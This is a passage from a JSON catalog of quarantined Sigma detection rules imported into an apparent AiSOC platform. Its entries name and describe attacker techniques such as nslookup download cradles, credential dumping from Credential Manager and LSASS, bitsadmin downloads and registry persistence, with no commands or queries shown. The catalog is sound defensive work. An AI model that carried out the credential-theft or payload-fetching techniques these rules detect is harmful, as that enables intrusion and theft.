"sigmahq-sigma-99980a85-3a61-43d3-ac0f-b68d6b4797b1", "type": "detection", "name": "Google Cloud VPN Tunnel Modified or Deleted", "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-vpn-tunnel-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "type": "detection", "name": "Nslookup PowerShell Download Cradle", "description": "Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nslookup-powershell-download-cradle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml" } }, { "id": "sigmahq-sigma-999c3b12-0a8c-40b6-8e13-dd7d62b75c7a", "type": "detection", "name": "Potentially Suspicious Named Pipe Created Via Mkfifo", "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility in a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-named-pipe-created-via-mkfifo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "999c3b12-0a8c-40b6-8e13-dd7d62b75c7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml" } }, { "id": "sigmahq-sigma-99b7460d-c9f1-40d7-a316-1f36f61d52ee", "type": "detection", "name": "Cscript/Wscript Uncommon Script Extension Execution", "description": "Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cscript-wscript-uncommon-script-extension-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99b7460d-c9f1-40d7-a316-1f36f61d52ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml" } }, { "id": "sigmahq-sigma-99b97608-3e21-4bfe-8217-2a127c396a0e", "type": "detection", "name": "Remote Thread Creation Via PowerShell In Uncommon Target", "description": "Detects the creation of a remote thread from a Powershell process in an uncommon target process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-via-powershell-in-uncommon-target.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99b97608-3e21-4bfe-8217-2a127c396a0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml" } }, { "id": "sigmahq-sigma-99c4658d-2c5e-4d87-828d-7c066ca537c3", "type": "detection", "name": "Disable-WindowsOptionalFeature Command PowerShell", "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windowsoptionalfeature-command-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml" } }, { "id": "sigmahq-sigma-99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "type": "detection", "name": "Dump Credentials from Windows Credential Manager With PowerShell", "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dump-credentials-from-windows-credential-manager-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" } }, { "id": "sigmahq-sigma-99c840f2-2012-46fd-9141-c761987550ef", "type": "detection", "name": "Suspicious Download From Direct IP Via Bitsadmin", "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-from-direct-ip-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99c840f2-2012-46fd-9141-c761987550ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-99c8be4f-3087-4f9f-9c24-8c7e257b442e", "type": "detection", "name": "Setup16.EXE Execution With Custom .Lst File", "description": "Detects the execution of \"Setup16.EXE\" and old installation utility with a custom \".lst\" file.\nThese \".lst\" file can contain references to external program that \"Setup16.EXE\" will execute.\nAttackers and adversaries might leverage this as a living of the land utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/setup16-exe-execution-with-custom-lst-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99c8be4f-3087-4f9f-9c24-8c7e257b442e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_setup16_custom_lst_execution.yml" } }, { "id": "sigmahq-sigma-99cf1e02-00fb-4c0d-8375-563f978dfd37", "type": "detection", "name": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deny-service-access-using-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml" } }, { "id": "sigmahq-sigma-9a019ffc-3580-4c9d-8d87-079f7e8d3fd4", "type": "detection", "name": "Cloudflared Tunnel Execution", "description": "Detects execution of the \"cloudflared\" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1090", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a019ffc-3580-4c9d-8d87-079f7e8d3fd4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml" } }, { "id": "sigmahq-sigma-9a025188-6f2d-42f8-bb2f-d3a83d24a5af", "type": "detection", "name": "Windows AppX Deployment Unsigned Package Installation", "description": "Detects attempts to install unsigned MSIX/AppX packages using the -AllowUnsigned parameter via AppXDeployment-Server events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-appx-deployment-unsigned-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a025188-6f2d-42f8-bb2f-d3a83d24a5af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_unsigned_package_installation.yml" } }, { "id": "sigmahq-sigma-9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "type": "detection", "name": "Microsoft VBA For Outlook Addin Loaded Via Outlook", "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-vba-for-outlook-addin-loaded-via-outlook.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_outlook_outlvba_load.yml" } }, { "id": "sigmahq-sigma-9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", "type": "detection", "name": "System Owner or User Discovery - Linux", "description": "Detects the execution of host or user discovery utilities such as \"whoami\", \"hostname\", \"id\", etc.\nAdversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-owner-or-user-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_user_discovery.yml" } }, { "id": "sigmahq-sigma-9a132afa-654e-11eb-ae93-0242ac130002", "type": "detection", "name": "PUA - AdFind Suspicious Execution", "description": "Detects AdFind execution with common flags seen used during attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1087.002", "T1482", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-adfind-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a132afa-654e-11eb-ae93-0242ac130002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml" } }, { "id": "sigmahq-sigma-9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "type": "detection", "name": "Potential Credential Dumping Via WER", "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-via-wer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml" } }, { "id": "sigmahq-sigma-9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "type": "detection", "name": "SysKey Registry Keys Access", "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syskey-registry-keys-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_syskey_registry_access.yml" } }, { "id": "sigmahq-sigma-9a60e676-26ac-44c3-814b-0c2a8b977adf", "type": "detection", "name": "User Access Blocked by Azure Conditional Access", "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights\u2248 of unauthorizeed login to valid accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-access-blocked-by-azure-conditional-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a60e676-26ac-44c3-814b-0c2a8b977adf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml" } }, { "id": "sigmahq-sigma-9a7a0393-2144-4626-9bf1-7c2f5a7321db", "type": "detection", "name": "System Network Connections Discovery - MacOs", "description": "Detects usage of system utilities to discover system network connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-connections-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" } }, { "id": "sigmahq-sigma-9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "type": "detection", "name": "Forfiles Command Execution", "description": "Detects the execution of \"forfiles\" with the \"/c\" flag.\nWhile this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.\nCan be used to bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/forfiles-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml" } }, { "id": "sigmahq-sigma-9ac8b09b-45de-4a07-9da1-0de8c09304a3", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" } }, { "id": "sigmahq-sigma-9ac94dc8-9042-493c-ba45-3b5e7c86b980", "type": "detection", "name": "Disable Important Scheduled Task", "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-important-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_disable.yml" } }, { "id": "sigmahq-sigma-9ace0707-b560-49b8-b6ca-5148b42f39fb", "type": "detection", "name": "Potential Persistence Via Logon Scripts - Registry", "description": "Detects creation of \"UserInitMprLogonScript\" registry value which can be used as a persistence method by malicious actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-logon-scripts-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml" } }, { "id": "sigmahq-sigma-9acf45ed-3a26-4062-bf08-56857613eb52", "type": "detection", "name": "New File Exclusion Added To Time Machine Via Tmutil - MacOS", "description": "Detects the addition of a new file or path exclusion to MacOS Time Machine via the \"tmutil\" utility.\nAn adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-file-exclusion-added-to-time-machine-via-tmutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9acf45ed-3a26-4062-bf08-56857613eb52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" } }, { "id": "sigmahq-sigma-9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "type": "detection", "name": "CredUI.DLL Loaded By Uncommon Process", "description": "Detects loading of \"credui.dll\" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of \"CredUIPromptForCredentials\" or \"CredUnPackAuthenticationBufferW\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credui-dll-loaded-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml" } }, { "id": "sigmahq-sigma-9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "type": "detection", "name": "Changing Existing Service ImagePath Value Via Reg.EXE", "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/changing-existing-service-imagepath-value-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" } }, { "id": "sigmahq-sigma-9b0f8a61-91b2-464f-aceb-0527e0a45020", "type": "detection", "name": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", "description": "Detects COM object hijacking via TreatAs subkey", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-com-object-hijacking-via-treatas-subkey-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml" } }, { "id": "sigmahq-sigma-9b111d8e-92e0-4153-88bc-daefc1333aba", "type": "detection", "name": "DMSA Link Attributes Modified", "description": "Detects modification of dMSA link attributes (msDS-ManagedAccountPrecededByLink) via PowerShell scripts.\nThis command line pattern could be an indicator an attempt to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dmsa-link-attributes-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b111d8e-92e0-4153-88bc-daefc1333aba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_modification_of_dmsa_link_attribute.yml" } }, { "id": "sigmahq-sigma-9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d", "type": "detection", "name": "AWS STS GetCallerIdentity Enumeration Via TruffleHog", "description": "Detects the use of TruffleHog for AWS credential validation by identifying GetCallerIdentity API calls where the userAgent indicates TruffleHog.\nThreat actors leverage TruffleHog to enumerate and validate exposed AWS keys.\nSuccessful exploitation allows threat actors to confirm the validity of compromised AWS credentials, facilitating further unauthorized access and actions within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-sts-getcalleridentity-enumeration-via-trufflehog.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sts_getcalleridentity_trufflehog.yml" } }, { "id": "sigmahq-sigma-9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", "type": "detection", "name": "End User Consent", "description": "Detects when an end user consents to an application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ 